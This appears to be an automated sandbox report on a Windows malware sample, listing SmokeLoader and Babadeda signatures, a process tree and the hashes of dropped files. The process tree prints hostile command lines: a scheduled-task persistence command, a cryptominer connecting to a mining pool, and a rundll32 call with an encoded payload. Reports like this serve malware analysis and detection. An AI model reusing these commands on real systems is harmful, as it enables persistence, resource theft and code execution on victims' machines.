Analysis

  • max time kernel
    151s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    10-12-2022 08:55

General

  • Target

    aca68203af0b0d04226e4f0a90b7eb7e320c488b0e20a64872bfcea0f07b2096.exe

  • Size

    319KB

  • MD5

    aad4844c41f3ecfa8237db11ae1e9124

  • SHA1

    7457cf6352a6124fa95f0f6764899462402fd7db

  • SHA256

    aca68203af0b0d04226e4f0a90b7eb7e320c488b0e20a64872bfcea0f07b2096

  • SHA512

    99b745c7e5f7c8c97c2cf73baf05e9bc2717bb591edcd59e396d325ffb3a2939c983ce654c293040ee123a10d3d7534394b775f92feac5bb243b8ce286a3a4eb

  • SSDEEP

    6144:z56jLzbORBEgTfR727E2AwGHH6dwwO0ZrrMC7C:z5G/bO3zjRJzwpRQEC

Malware Config

Signatures

  • Babadeda

    Babadeda is a crypter delivered as a legitimate installer and used to drop other malware families.

  • Babadeda Crypter 3 IoCs
  • Detects Smokeloader packer 1 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 6 IoCs
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 12 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Uses the VBS compiler for execution 1 TTPs
  • Accesses Microsoft Outlook profiles 1 TTPs 6 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Maps connected drives based on registry 3 TTPs 2 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 19 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\aca68203af0b0d04226e4f0a90b7eb7e320c488b0e20a64872bfcea0f07b2096.exe
    "C:\Users\Admin\AppData\Local\Temp\aca68203af0b0d04226e4f0a90b7eb7e320c488b0e20a64872bfcea0f07b2096.exe"
    1⤵
    • Checks SCSI registry key(s)
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    PID:3324
  • C:\Users\Admin\AppData\Local\Temp\5DCF.exe
    C:\Users\Admin\AppData\Local\Temp\5DCF.exe
    1⤵
    • Executes dropped EXE
    • Checks computer location settings
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1836
    • C:\Users\Admin\AppData\Local\Temp\442399284-8a9Ah054og8jEcGP.exe
      "C:\Users\Admin\AppData\Local\Temp\442399284-8a9Ah054og8jEcGP.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:3332
      • C:\Windows\System32\Wbem\wmic.exe
        wmic os get Caption
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:3780
      • C:\Windows\system32\cmd.exe
        cmd /C "wmic path win32_VideoController get name"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4552
        • C:\Windows\System32\Wbem\WMIC.exe
          wmic path win32_VideoController get name
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:4492
      • C:\Windows\system32\cmd.exe
        cmd /C "wmic cpu get name"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1712
        • C:\Windows\System32\Wbem\WMIC.exe
          wmic cpu get name
          4⤵
            PID:2668
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell "" "start-process C:\Users\Admin\AppData\Local\Temp\dLsXdu1nnG.exe"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1224
          • C:\Users\Admin\AppData\Local\Temp\dLsXdu1nnG.exe
            "C:\Users\Admin\AppData\Local\Temp\dLsXdu1nnG.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:2900
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpEAEC.tmp.bat""
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:3864
              • C:\Windows\system32\timeout.exe
                timeout 3
                6⤵
                • Delays execution with timeout.exe
                PID:3168
              • C:\ProgramData\SystemInformation\V.exe
                "C:\ProgramData\SystemInformation\V.exe"
                6⤵
                • Executes dropped EXE
                • Checks computer location settings
                • Suspicious use of SetThreadContext
                PID:4768
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "V" /tr "C:\ProgramData\SystemInformation\V.exe"
                  7⤵
                    PID:1896
                    • C:\Windows\system32\schtasks.exe
                      schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "V" /tr "C:\ProgramData\SystemInformation\V.exe"
                      8⤵
                      • Creates scheduled task(s)
                      PID:4444
                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
                    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -a verus -o stratum+tcp://na.luckpool.net:3956 -u RCMiP9SrgQ54AMjhmbUTCtkeoHVVHvADHw.spaceteam -p x -t 5
                    7⤵
                      PID:1116
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c cls
                        8⤵
                          PID:4004
          • C:\Users\Admin\AppData\Local\Temp\91C1.exe
            C:\Users\Admin\AppData\Local\Temp\91C1.exe
            1⤵
            • Executes dropped EXE
            • Checks computer location settings
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:456
            • C:\Users\Admin\AppData\Roaming\Text Productivity Tools\text.exe
              "C:\Users\Admin\AppData\Roaming\Text Productivity Tools\text.exe"
              2⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Maps connected drives based on registry
              • Checks processor information in registry
              • Enumerates system info in registry
              • Suspicious use of SetWindowsHookEx
              • Suspicious use of WriteProcessMemory
              PID:4356
              • C:\Windows\system32\rundll32.exe
                "C:\Users\Admin\AppData\Roaming\nsis_unse57e995.dll",PrintUIEntry |5CQkOhiAAAA|1TKr5GsMwYD|67sDqg8OAAl|xYmwxC0TNSO|1k8B3tZkgiyf2sAZQByAG4XAP9sADMAMgAuAKVkHwBs8|AtBW8ZAFj|AHAAYwBmAEmvAGEAdyEAeTsAZvsATC0CWUiD7Cj|6AQCAABIg8T|KMPMzMxMiUT|JBhIiVQkEEjviUwkCFkBSItEvyQwSIkEJH0BOP1IawAISMdEJBD2LQHrDn0BEEiDwHUBiwEQfQFASDmSAPtzJZsDiwwkSAN|yEiLwUiLTKcB|VR3AAPRSIvKit8JiAjrwWIFZUjviwQlYPPwM8lI|4tQGEg70XQ2|0iDwiBIiwJI|zvCdCpmg3hI|xh1GkyLQFBmv0GDOGt0Bw0RS|t1CA0QeBAudAX|SIsA69VIi0j6+QDBZgBAU1VWV|9BVEFVQVZBV|5ZAWaBOU1aTYv|+EyL8kiL2Q|7hfzz8ExjSTxB|4E8CVBFAAAP+4Xq8|BBi4QJiP7z8IXASI08AQ97hNZmEYO8CYwtAfcPhMfz8ESLZyD|RItfHIt3JET|i08YTAPhTAP|2UgD8TPJRYXvyQ+EpPPwTYvE|0GLEEUz0kgD|9OKAoTAdB1Bv8HKDQ++wPYAAfdEA9C7EXXsQYH|+qr8DXx0DoP|wQFJg8AEQTv|yXNp68aLwQ||twxORYssi0y|A+t0WDPtphB071FBixS9ANMzyf+KAkyLwusPwe3JxBEDyOEQAUGK|QDREO0zwDP2Qec7DLbcEKIAg8YB|4P4CHLu6wpI|4vLQf|VSYkE9|eDxeAQxAQ7b|cYcq9iAUFfQV7|QV1BXF9eXVu+LxdIgexgAWAAi||p6Gb+||9IhW|AD4SZcSBMjasBfYsnEMgz|+ibeSD|jV8ETI1FQjN|0ovL|1QkaHwgv0yL4A+EbHEgRd6kEDPAi9ONIEiJ13wkIKIgcHwgSIvP8A+ETHEgoiBQSP+NVghEjUdASPeNjCSBEUiL2Oi7fP16II1WSNogENreIczz8Ohn6yBEi08GjVcIPSCiIFjGIa+JhCSAgxLd8|CLPQ7WIFiJjCRtEQMw9o0g6DHrIEyLXTq7i6wpMkiLnBYyTP+JZCQ4RI1nbO9JO+xIhiAwTIndXIABhCTcgxGGjvTjId8g8KwTSIvT6Nvn|AEwipxzMkiN|YRzMkGA8yFJi+|MRDAYoAKD6QHvdfOBvHMyIVJlf3h1SouEJPQeMfeUJPjz8APCSDv|6HI1QTvUdjD|RI1JQEkr1EHTuACUAKIgQMYi+HTzF0S0ML4xSI1TbL6NIE0rxOhsgDBI+4vOoiB4SIX|dPMUTIwwFzFIjUwk90C6A|Pw|9dIgRnEcCFdJAAA
                3⤵
                • Blocklisted process makes network request
                • Loads dropped DLL
                • Accesses Microsoft Outlook profiles
                • Checks processor information in registry
                • outlook_office_path
                • outlook_win_path
                PID:4084
                • C:\Windows\system32\WerFault.exe
                  C:\Windows\system32\WerFault.exe -u -p 4084 -s 304
                  4⤵
                  • Program crash
                  PID:3676
          • C:\Windows\SysWOW64\explorer.exe
            C:\Windows\SysWOW64\explorer.exe
            1⤵
              PID:2348
            • C:\Windows\explorer.exe
              C:\Windows\explorer.exe
              1⤵
                PID:3256
              • C:\Windows\SysWOW64\explorer.exe
                C:\Windows\SysWOW64\explorer.exe
                1⤵
                  PID:3376
                • C:\Windows\explorer.exe
                  C:\Windows\explorer.exe
                  1⤵
                    PID:3560
                  • C:\Windows\SysWOW64\explorer.exe
                    C:\Windows\SysWOW64\explorer.exe
                    1⤵
                      PID:3492
                    • C:\Windows\SysWOW64\explorer.exe
                      C:\Windows\SysWOW64\explorer.exe
                      1⤵
                        PID:1248
                      • C:\Windows\SysWOW64\explorer.exe
                        C:\Windows\SysWOW64\explorer.exe
                        1⤵
                          PID:1900
                        • C:\Windows\explorer.exe
                          C:\Windows\explorer.exe
                          1⤵
                            PID:3336
                          • C:\Windows\SysWOW64\explorer.exe
                            C:\Windows\SysWOW64\explorer.exe
                            1⤵
                              PID:2972
                            • C:\Windows\system32\WerFault.exe
                              C:\Windows\system32\WerFault.exe -pss -s 452 -p 4084 -ip 4084
                              1⤵
                                PID:5072

                              Network

                              MITRE ATT&CK Enterprise v6

                              Replay Monitor

                              Loading Replay Monitor...

                              Downloads

                              • C:\ProgramData\SystemInformation\V.exe

                                Filesize

                                892KB

                                MD5

                                6bcdb0510f46aa502aef2378f79434bf

                                SHA1

                                f46e3ca6042354f2d81228d3648e8ba5c96b7867

                                SHA256

                                8b707a410ca9738c7009edc0933475ce8b00d4e7bcabe25a6b35d84cae2ea81b

                                SHA512

                                73b8979d06d97bc3a4223fa3df6b808b1b52cd587042763a066658fa5993af27729a04c5998c753b980318c5822f2b0523fe0200fde6cd6699e9b5eb0e7f3a63

                              • C:\ProgramData\SystemInformation\V.exe

                                Filesize

                                892KB

                                MD5

                                6bcdb0510f46aa502aef2378f79434bf

                                SHA1

                                f46e3ca6042354f2d81228d3648e8ba5c96b7867

                                SHA256

                                8b707a410ca9738c7009edc0933475ce8b00d4e7bcabe25a6b35d84cae2ea81b

                                SHA512

                                73b8979d06d97bc3a4223fa3df6b808b1b52cd587042763a066658fa5993af27729a04c5998c753b980318c5822f2b0523fe0200fde6cd6699e9b5eb0e7f3a63

                              • C:\Users\Admin\AppData\Local\Temp\442399284-8a9Ah054og8jEcGP.exe

                                Filesize

                                4.5MB

                                MD5

                                210d0e2a6972569ae0cc2e191610ede7

                                SHA1

                                74080b265b2f29cc0d2fac5b02034a9c4b6c9f22

                                SHA256

                                bbdda1d7ec80b360df21e711400497bbeccf3b22bbd9723f5b869378a8a0557d

                                SHA512

                                d7b51dd3334c37fbabc0c0047debfc52e7febc1a590a9974bbc0453d035b3b340b35eb0f4ab3d15c235a4f4d7092915e86a3d805fc173d21a1c7fdde12a94e2a

                              • C:\Users\Admin\AppData\Local\Temp\442399284-8a9Ah054og8jEcGP.exe

                                Filesize

                                4.5MB

                                MD5

                                210d0e2a6972569ae0cc2e191610ede7

                                SHA1

                                74080b265b2f29cc0d2fac5b02034a9c4b6c9f22

                                SHA256

                                bbdda1d7ec80b360df21e711400497bbeccf3b22bbd9723f5b869378a8a0557d

                                SHA512

                                d7b51dd3334c37fbabc0c0047debfc52e7febc1a590a9974bbc0453d035b3b340b35eb0f4ab3d15c235a4f4d7092915e86a3d805fc173d21a1c7fdde12a94e2a

                              • C:\Users\Admin\AppData\Local\Temp\5DCF.exe

                                Filesize

                                922KB

                                MD5

                                0cec15477b0a89e89f78961fdd2f56b8

                                SHA1

                                48701957b74b12cfb521c8881ec9beac78f8866d

                                SHA256

                                03de8297c43f7161e56416e5f7180bee53b5234f5c4f757cb0084b9603057351

                                SHA512

                                1c8162b29d77035c23148cad569162f739ddc0c501fbf9dbc7cb06ffeaa7eb69d3f505aee167700eeba65fa6cab62ce92e3270b6d694f6f07192d8d3819ec595

                              • C:\Users\Admin\AppData\Local\Temp\5DCF.exe

                                Filesize

                                922KB

                                MD5

                                0cec15477b0a89e89f78961fdd2f56b8

                                SHA1

                                48701957b74b12cfb521c8881ec9beac78f8866d

                                SHA256

                                03de8297c43f7161e56416e5f7180bee53b5234f5c4f757cb0084b9603057351

                                SHA512

                                1c8162b29d77035c23148cad569162f739ddc0c501fbf9dbc7cb06ffeaa7eb69d3f505aee167700eeba65fa6cab62ce92e3270b6d694f6f07192d8d3819ec595

                              • C:\Users\Admin\AppData\Local\Temp\91C1.exe

                                Filesize

                                15.6MB

                                MD5

                                2b0b6f7adb2c4f30a25aa73f19eb69de

                                SHA1

                                6856ec4a84ba879e8118bbe8fd89237f12977a7e

                                SHA256

                                5d270c5f31a22248cc088654d6ea6f293d000e3780ed1d0e180ea005b6e120bd

                                SHA512

                                4018b7127fe13b8f4ccfd4ad5ac842e4e56e2f4c8637cdaca34b614106724ba24c57d572e11643b89265cfbed128016edf60c0b823224d45004c82585e473b62

                              • C:\Users\Admin\AppData\Local\Temp\91C1.exe

                                Filesize

                                15.6MB

                                MD5

                                2b0b6f7adb2c4f30a25aa73f19eb69de

                                SHA1

                                6856ec4a84ba879e8118bbe8fd89237f12977a7e

                                SHA256

                                5d270c5f31a22248cc088654d6ea6f293d000e3780ed1d0e180ea005b6e120bd

                                SHA512

                                4018b7127fe13b8f4ccfd4ad5ac842e4e56e2f4c8637cdaca34b614106724ba24c57d572e11643b89265cfbed128016edf60c0b823224d45004c82585e473b62

                              • C:\Users\Admin\AppData\Local\Temp\dLsXdu1nnG.exe

                                Filesize

                                892KB

                                MD5

                                6bcdb0510f46aa502aef2378f79434bf

                                SHA1

                                f46e3ca6042354f2d81228d3648e8ba5c96b7867

                                SHA256

                                8b707a410ca9738c7009edc0933475ce8b00d4e7bcabe25a6b35d84cae2ea81b

                                SHA512

                                73b8979d06d97bc3a4223fa3df6b808b1b52cd587042763a066658fa5993af27729a04c5998c753b980318c5822f2b0523fe0200fde6cd6699e9b5eb0e7f3a63

                              • C:\Users\Admin\AppData\Local\Temp\dLsXdu1nnG.exe

                                Filesize

                                892KB

                                MD5

                                6bcdb0510f46aa502aef2378f79434bf

                                SHA1

                                f46e3ca6042354f2d81228d3648e8ba5c96b7867

                                SHA256

                                8b707a410ca9738c7009edc0933475ce8b00d4e7bcabe25a6b35d84cae2ea81b

                                SHA512

                                73b8979d06d97bc3a4223fa3df6b808b1b52cd587042763a066658fa5993af27729a04c5998c753b980318c5822f2b0523fe0200fde6cd6699e9b5eb0e7f3a63

                              • C:\Users\Admin\AppData\Local\Temp\pb79F0B1C8\PB3Dll.dll

                                Filesize

                                202KB

                                MD5

                                142bc2bb269b896cc0f11f9021dcbc52

                                SHA1

                                75b09b25f8f6b3b0fc94fcdcc61d932f303ac418

                                SHA256

                                5da7da9abb77790ddbb87d86b9ea4b01a4f375035827e30fa879dab8c2a737db

                                SHA512

                                150ffd4e66ee126912c6a5071bec750e4b5e603af9cc79b26c63e482f7d5d0aafcae1c995f10b60ba2da138effb19c668e1515f35db3b8b7a508ef34f59d134a

                              • C:\Users\Admin\AppData\Local\Temp\pb79F0B1C8\PBCore.dll

                                Filesize

                                472KB

                                MD5

                                016a5d74b1e5a4625bf1ad1aac6bfb68

                                SHA1

                                1a4247c53e1472e2199c12e46389ac0df172bc19

                                SHA256

                                d43cb6a64b707d13ac99936e71c6be436c32a76506ed1fe462e2f9249722d487

                                SHA512

                                f635d56caf1d50e6ad8c5074d0840cdb127380898f5e63b53c0eda1a7230012e4ba622d3639d6ef72bde1250c500fc798b5ef90ff07b53f1eb3343034fb6f3a7

                              • C:\Users\Admin\AppData\Local\Temp\tmpEAEC.tmp.bat

                                Filesize

                                147B

                                MD5

                                275b8e6c161c8001c290ccefbbd8bb64

                                SHA1

                                a660baf185d309961d405130247fe356757cdee7

                                SHA256

                                54312d00111a6ebff3efe4ddb021bb3c519931d35578475e3065f70e0b2ea1a4

                                SHA512

                                f0b1439784540019ae6ee41f3ac6f58e1a5d224e55f7d195c34278c9567fd7b268c1d243571812ba50e0845d9fe9634d94405c43cadcf44c591964484f4f7cdd

                              • C:\Users\Admin\AppData\Roaming\Text Productivity Tools\HunspellX86.dll

                                Filesize

                                437KB

                                MD5

                                a8d72f9e1e75420cea790ebb071a3810

                                SHA1

                                ba6ab45d2b14cb43bfd952aca642e071ff4784e9

                                SHA256

                                c0cd8aab3a4b3f9ca22378c79ccb012875d3b717ca5646436193a632164be012

                                SHA512

                                21acad06fcf5f95472b893440d12c20a95743271f7341f431f2f0f14b92e3d12c7a91c09228f812cca3a61b7fa413766699b49ffc17197b92acc9f3f5787f7f6

                              • C:\Users\Admin\AppData\Roaming\Text Productivity Tools\Hunspellx86.dll

                                Filesize

                                437KB

                                MD5

                                a8d72f9e1e75420cea790ebb071a3810

                                SHA1

                                ba6ab45d2b14cb43bfd952aca642e071ff4784e9

                                SHA256

                                c0cd8aab3a4b3f9ca22378c79ccb012875d3b717ca5646436193a632164be012

                                SHA512

                                21acad06fcf5f95472b893440d12c20a95743271f7341f431f2f0f14b92e3d12c7a91c09228f812cca3a61b7fa413766699b49ffc17197b92acc9f3f5787f7f6

                              • C:\Users\Admin\AppData\Roaming\Text Productivity Tools\MSVCP140.dll

                                Filesize

                                428KB

                                MD5

                                fdd04dbbcf321eee5f4dd67266f476b0

                                SHA1

                                65ffdfe2664a29a41fcf5039229ccecad5b825b9

                                SHA256

                                21570bcb7a77e856f3113235d2b05b2b328d4bb71b4fd9ca4d46d99adac80794

                                SHA512

                                04cfc3097fbce6ee1b7bac7bd63c3cffe7dca16f0ec9cd8fe657d8b7ebd06dcba272ff472f98c6385c3cfb9b1ac3f47be8ca6d3ea80ab4aeed44a0e2ce3185dd

                              • C:\Users\Admin\AppData\Roaming\Text Productivity Tools\VCRUNTIME140.dll

                                Filesize

                                77KB

                                MD5

                                ba65db6bfef78a96aee7e29f1449bf8a

                                SHA1

                                06c7beb9fd1f33051b0e77087350903c652f4b77

                                SHA256

                                141690572594dbd3618a4984712e9e36fc09c9906bb845ce1a9531ac8f7ad493

                                SHA512

                                ca63eeac10ef55d7e2e55479b25cf394e58aef1422951f361f762ab667f72a3454f55afc04e967e8cdd20cf3eebe97083e0438ea941916a09e7d091818ea830e

                              • C:\Users\Admin\AppData\Roaming\Text Productivity Tools\dm

                                Filesize

                                1.4MB

                                MD5

                                86e3cdb4ce5278becd9ebea27e48d3f0

                                SHA1

                                44b63d3c58310387ca7e535671c34218ad98c7e0

                                SHA256

                                eec35cba92f56bdc5252b2edb3bd8b958ee3cc0ab245d0fe0eb7b7b49f4da46a

                                SHA512

                                7debc2c77eb749eb26b455fa6ab465f13c0060393e6eabad72e1cc2a26bf2274dcf061564004c39ed6c4fc460f0b0e10702d1182774d0f3451ca6cba3ed39018

                              • C:\Users\Admin\AppData\Roaming\Text Productivity Tools\extract_help.htm

                                Filesize

                                5KB

                                MD5

                                2b28b429bad9ecc1be318437a2e4f1ff

                                SHA1

                                cf52adfd6760aa6fd4e35b27ba8dc83f68472063

                                SHA256

                                fa989ac26c974984a87ed232f86f4404115df81e7816abaee52d5d5fa0ca3b1f

                                SHA512

                                606219e30267299f0aa4a6e556913528b743d82bab0d28db769db7db81b1a9a3554792955a3dc032f5cdb6dfd62ee113f33b3a18489c85d6d71c22d7fb857134

                              • C:\Users\Admin\AppData\Roaming\Text Productivity Tools\libminddb.dll

                                Filesize

                                13KB

                                MD5

                                7e1ad32b95b09b1b3fc5a5bec6d5099a

                                SHA1

                                35e2579111a22f861ec5448fc69cdfcbd29fa624

                                SHA256

                                1d0e7355da042f27ed046d30853a2b381f2cfe12230afe9977fb6d600577b3fb

                                SHA512

                                f5fd5692d17e9d97fa1eee1546e896015a7a6431ef61afb8d186e278789354c44bd48bcfa6d16f2337a1019799eb67361e9e9bea4d0a19cdd66f850b36926420

                              • C:\Users\Admin\AppData\Roaming\Text Productivity Tools\libminddb.dll

                                Filesize

                                13KB

                                MD5

                                7e1ad32b95b09b1b3fc5a5bec6d5099a

                                SHA1

                                35e2579111a22f861ec5448fc69cdfcbd29fa624

                                SHA256

                                1d0e7355da042f27ed046d30853a2b381f2cfe12230afe9977fb6d600577b3fb

                                SHA512

                                f5fd5692d17e9d97fa1eee1546e896015a7a6431ef61afb8d186e278789354c44bd48bcfa6d16f2337a1019799eb67361e9e9bea4d0a19cdd66f850b36926420

                              • C:\Users\Admin\AppData\Roaming\Text Productivity Tools\libmsagl.dll

                                Filesize

                                32KB

                                MD5

                                53634bc76f19ea065981ac1b02225df9

                                SHA1

                                7d1cb4ae535c30d2443c4b8f14927300c8449839

                                SHA256

                                e9053b628bf89440e0ad4874a5c234fe058539f20f9bf02d36c7492fed70857a

                                SHA512

                                3b46f34b4d370f44f219f0a404ae1f9a53897ddaabfb7665197dc16b538a13d9ee89af7053fd74998dc38321af8f076759f535d5a855f6ff5212d88704c79d3a

                              • C:\Users\Admin\AppData\Roaming\Text Productivity Tools\libmsagl.dll

                                Filesize

                                32KB

                                MD5

                                53634bc76f19ea065981ac1b02225df9

                                SHA1

                                7d1cb4ae535c30d2443c4b8f14927300c8449839

                                SHA256

                                e9053b628bf89440e0ad4874a5c234fe058539f20f9bf02d36c7492fed70857a

                                SHA512

                                3b46f34b4d370f44f219f0a404ae1f9a53897ddaabfb7665197dc16b538a13d9ee89af7053fd74998dc38321af8f076759f535d5a855f6ff5212d88704c79d3a

                              • C:\Users\Admin\AppData\Roaming\Text Productivity Tools\libmsagl.dll

                                Filesize

                                32KB

                                MD5

                                53634bc76f19ea065981ac1b02225df9

                                SHA1

                                7d1cb4ae535c30d2443c4b8f14927300c8449839

                                SHA256

                                e9053b628bf89440e0ad4874a5c234fe058539f20f9bf02d36c7492fed70857a

                                SHA512

                                3b46f34b4d370f44f219f0a404ae1f9a53897ddaabfb7665197dc16b538a13d9ee89af7053fd74998dc38321af8f076759f535d5a855f6ff5212d88704c79d3a

                              • C:\Users\Admin\AppData\Roaming\Text Productivity Tools\license.txt

                                Filesize

                                10KB

                                MD5

                                f0656f89c18cb41595453ab550ed44fb

                                SHA1

                                430bacdbcd2077547dbde66f53624d78c71c4577

                                SHA256

                                327dce257228c2a74d8c5c7cb23d7bb338e2e270764ea35cf33c14e570cac981

                                SHA512

                                8e468a04fe178398f8e32ce2d77c8530e15310e0bc2df71cb81af175735f58811a733bf8f35d652febb090993fea571385fb193e5317841cfc1e0b6ba2046efe

                              • C:\Users\Admin\AppData\Roaming\Text Productivity Tools\md.dat

                                Filesize

                                200KB

                                MD5

                                33526dea59ea40b601a61c9ac5bfa93e

                                SHA1

                                b7a06b5de9f02f6c584fe5c7b2d7f3056c52f5aa

                                SHA256

                                7dfa9316378c0ec79ddbfbf08eaf1f01a86e7e11aa0505adac7112425351419f

                                SHA512

                                c65f8e3080c646f19b31b7e986490c76f2e9cb6e7600fa3d1d0fedcdc69e6b33618609ca2313a4c21fa2e7581f4ebdb782133966e0788e99e97c27f95fe67207

                              • C:\Users\Admin\AppData\Roaming\Text Productivity Tools\msvcp140.dll

                                Filesize

                                428KB

                                MD5

                                fdd04dbbcf321eee5f4dd67266f476b0

                                SHA1

                                65ffdfe2664a29a41fcf5039229ccecad5b825b9

                                SHA256

                                21570bcb7a77e856f3113235d2b05b2b328d4bb71b4fd9ca4d46d99adac80794

                                SHA512

                                04cfc3097fbce6ee1b7bac7bd63c3cffe7dca16f0ec9cd8fe657d8b7ebd06dcba272ff472f98c6385c3cfb9b1ac3f47be8ca6d3ea80ab4aeed44a0e2ce3185dd

                              • C:\Users\Admin\AppData\Roaming\Text Productivity Tools\msvcp140.dll

                                Filesize

                                428KB

                                MD5

                                fdd04dbbcf321eee5f4dd67266f476b0

                                SHA1

                                65ffdfe2664a29a41fcf5039229ccecad5b825b9

                                SHA256

                                21570bcb7a77e856f3113235d2b05b2b328d4bb71b4fd9ca4d46d99adac80794

                                SHA512

                                04cfc3097fbce6ee1b7bac7bd63c3cffe7dca16f0ec9cd8fe657d8b7ebd06dcba272ff472f98c6385c3cfb9b1ac3f47be8ca6d3ea80ab4aeed44a0e2ce3185dd

                              • C:\Users\Admin\AppData\Roaming\Text Productivity Tools\settings.ini

                                Filesize

                                102B

                                MD5

                                5b9efae16ed24a00cd143caa386017e1

                                SHA1

                                fb52e115a189fc3c16cd973473dbeccc588e7b71

                                SHA256

                                26c1579b128be6b0ae2fbeebf556ea4f0facb6ec8bf318736b06ee1e06704523

                                SHA512

                                738e2ab5f0a08095d8962490eb8535f19dc34070680eb5d975fb6926bb735543353cd7de3c901c15cf14107152e367c8c5650fb131683068d8ebbc030603cc6c

                              • C:\Users\Admin\AppData\Roaming\Text Productivity Tools\text.exe

                                Filesize

                                9.6MB

                                MD5

                                4e8bbd13922b08c0a0b851b1bce6b2e0

                                SHA1

                                4510265de5c1d395b451bcc2c5847ff88292dd7f

                                SHA256

                                bcc187bb85d27785ebf14930d1156096076ee89497878b252f277cef5d87915a

                                SHA512

                                4ba1810f998f132423f2172cbb154601ba3d705c8fdcabbb25eeec2042ca2e2cacf78ed6d281aad7a1f2caa5e220e9a6b03285b6e7658c078a917c39ab61d7b0

                              • C:\Users\Admin\AppData\Roaming\Text Productivity Tools\unins000.dat

                                Filesize

                                12KB

                                MD5

                                390f806d9f8c354e90b1c1a4f2a6407b

                                SHA1

                                bf3b7162bdf3e3dbff94fdfe5d7ef6fa793f8b26

                                SHA256

                                13c0e3080ba7b2d299399d53fe82053719bebdf0c86f14092d89037ce00591f9

                                SHA512

                                87c3d007484f18d6126ce7081eaeccebc9a265d8eaf46cdf3039c8b77c8fb921a1a1a24e5f4a1d7a510fb64e7d5ff0b6358356a885108477f772396ee01c9f29

                              • C:\Users\Admin\AppData\Roaming\Text Productivity Tools\unins000.msg

                                Filesize

                                22KB

                                MD5

                                524800545e00c0806daa96054758d2a1

                                SHA1

                                36dbb61f99a5064a4059079b39a26b9bd89db67c

                                SHA256

                                45f19302c2cfca8445e1d3a0b34646adae35c05efe5df79e32d451eed8326672

                                SHA512

                                92f227567a8ccd09947279fa285efa0abcfafa1fefa33912f8460bb7c17267c3b60795ce8d92c1a1c01da6960c6171a82126deb36c6c6bc4c063717db07dbcae

                              • C:\Users\Admin\AppData\Roaming\Text Productivity Tools\vcruntime140.dll

                                Filesize

                                77KB

                                MD5

                                ba65db6bfef78a96aee7e29f1449bf8a

                                SHA1

                                06c7beb9fd1f33051b0e77087350903c652f4b77

                                SHA256

                                141690572594dbd3618a4984712e9e36fc09c9906bb845ce1a9531ac8f7ad493

                                SHA512

                                ca63eeac10ef55d7e2e55479b25cf394e58aef1422951f361f762ab667f72a3454f55afc04e967e8cdd20cf3eebe97083e0438ea941916a09e7d091818ea830e

                              • C:\Users\Admin\AppData\Roaming\Text Productivity Tools\vcruntime140.dll

                                Filesize

                                77KB

                                MD5

                                ba65db6bfef78a96aee7e29f1449bf8a

                                SHA1

                                06c7beb9fd1f33051b0e77087350903c652f4b77

                                SHA256

                                141690572594dbd3618a4984712e9e36fc09c9906bb845ce1a9531ac8f7ad493

                                SHA512

                                ca63eeac10ef55d7e2e55479b25cf394e58aef1422951f361f762ab667f72a3454f55afc04e967e8cdd20cf3eebe97083e0438ea941916a09e7d091818ea830e

                              • C:\Users\Admin\AppData\Roaming\Text Productivity Tools\vcruntime140.dll

                                Filesize

                                77KB

                                MD5

                                ba65db6bfef78a96aee7e29f1449bf8a

                                SHA1

                                06c7beb9fd1f33051b0e77087350903c652f4b77

                                SHA256

                                141690572594dbd3618a4984712e9e36fc09c9906bb845ce1a9531ac8f7ad493

                                SHA512

